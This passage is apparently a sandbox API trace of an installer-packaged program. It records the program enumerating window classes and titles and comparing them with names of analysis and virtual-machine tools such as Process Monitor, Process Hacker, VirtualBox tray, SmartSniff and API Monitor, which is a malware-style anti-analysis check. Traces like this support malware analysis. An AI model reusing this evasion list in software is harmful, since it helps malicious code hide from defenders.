lpString1="GetClassName") returned="GetClassName" [0158.439] lstrcpynA (in: lpString1=0x3401e0, lpString2="131390", iMaxLength=1024 | out: lpString1="131390") returned="131390" [0158.439] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.439] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.439] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.439] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ATL:000007FEF62152C0") returned 20 [0158.439] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.439] lstrcpynA (in: lpString1=0x341200, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.439] lstrcpyA (in: lpString1=0x430c00, lpString2="ATL:000007FEF62152C0" | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.439] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131390") returned 6 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.440] lstrlenA (lpString="0") returned 1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="PROCEXPL") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="PROCMON_WINDOW_CLASS") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="VBoxTrayToolWndClass") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="VMSwitchUserControlClass") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="ProcessLasso_Notification_Class") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="SmartSniff") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="ProcessHacker") returned -1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.440] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.440] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.440] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.440] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.441] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="SysAnalyzer") returned -1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.441] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.441] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="VMSwitchUserControlClass") returned -1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrlenA (lpString="ATL:000007FEF62152C0") returned 20 [0158.441] lstrcpynA (in: lpString1=0x40ac18, lpString2="ATL:000007FEF62152C0", iMaxLength=1024 | out: lpString1="ATL:000007FEF62152C0") returned="ATL:000007FEF62152C0" [0158.441] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.441] lstrcmpiA (lpString1="ATL:000007FEF62152C0", lpString2="ProcessHacker") returned -1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrlenA (lpString="Network Flyout") returned 14 [0158.441] lstrcpynA (in: lpString1=0x40ac18, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.441] lstrcmpiA (lpString1="Network Flyout", lpString2="0") returned 1 [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrlenA (lpString="Network Flyout") returned 14 [0158.441] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrlenA (lpString="3399936") returned 7 [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.441] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrlenA (lpString="") returned 0 [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.441] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.441] lstrlenA (lpString="") returned 0 [0158.442] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrlenA (lpString="") returned 0 [0158.442] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.442] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.442] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.442] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.442] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.442] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.442] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.442] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.442] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.442] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.442] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.442] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.442] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.443] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] strstr (_Str="Network Flyout", _SubStr="- main thread") returned 0x0 [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.443] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrlenA (lpString="0") returned 1 [0158.443] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.443] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.443] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.443] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrlenA (lpString="0") returned 1 [0158.443] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrlenA (lpString="Network Flyout") returned 14 [0158.443] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrlenA (lpString="3399936") returned 7 [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrlenA (lpString="") returned 0 [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrlenA (lpString="") returned 0 [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrlenA (lpString="") returned 0 [0158.444] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.444] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.444] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.445] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.445] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.445] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.445] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.445] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.445] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.445] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.445] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.445] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.445] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.445] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.445] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.445] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.445] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.446] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.446] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] strstr (_Str="Network Flyout", _SubStr="API Monitor") returned 0x0 [0158.446] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.446] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.446] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.446] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.446] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrlenA (lpString="0") returned 1 [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrlenA (lpString="0") returned 1 [0158.448] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.448] lstrlenA (lpString="Network Flyout") returned 14 [0158.448] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.448] 